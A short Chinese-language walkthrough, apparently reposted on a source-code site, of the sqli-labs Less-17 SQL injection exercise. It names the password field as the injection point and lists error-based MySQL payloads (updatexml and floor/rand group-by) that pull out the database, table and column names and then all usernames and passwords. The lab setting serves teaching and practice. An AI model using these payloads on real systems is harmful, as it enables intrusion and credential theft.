0、初始网页
1、确定闭合字符
注入点在于password框,闭合字符为单引号
2、爆库名
1' and updatexml(1,concat(0x7e,database(),0x7e),1)#
1' and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x) as y) #
3、爆表名
1' and (select 1 from (select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x) as y) #
4、爆列名
1' and (select 1 from (select count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x) as y) #
5、查询最终结果
1' and (select 1 from (select count(*),concat((select group_concat(username,0x3a,password) from users),floor(rand()*2))x from information_schema.tables group by x) as y) #
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » SQL注入实例(sqli-labs/less-17)
发表评论 取消回复